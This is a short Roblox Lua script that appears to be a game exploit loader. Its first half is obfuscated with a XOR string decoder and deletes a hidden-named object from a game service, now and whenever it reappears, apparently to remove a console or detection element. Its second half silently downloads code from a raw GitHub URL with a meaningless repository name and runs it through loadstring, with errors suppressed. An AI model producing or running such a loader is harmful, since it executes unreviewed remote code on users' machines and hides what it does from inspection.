local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v11,v12) local v13={};for v18=1, #v11 do v6(v13,v0(v4(v1(v2(v11,v18,v18 + 1 )),v1(v2(v12,1 + (v18% #v12) ,1 + (v18% #v12) + 1 )))%256 ));end return v5(v13);end local v8=game:GetService(v7("\242\204\201\32\193\174\206","\126\177\163\187\69\134\219\167"));local v9=v7("\7\200\60\230\243\45\222\37\201\249\14\204\57\209\249\49","\156\67\173\74\165");local function v10(v14) if (v14.Name==v9) then v14:Destroy();end end for v15,v16 in ipairs(v8:GetChildren()) do v10(v16);end v8.ChildAdded:Connect(function(v17) v10(v17);end);

local function SafeCall(fn)
    return xpcall(fn, function() end)
end

SafeCall(function()
    loadstring(game:HttpGet(
        "https://raw.githubusercontent.com/polpoep907-blip/5616516515615656565656565665/refs/heads/main/6d5qa1he9898gz"
    ))()
end)
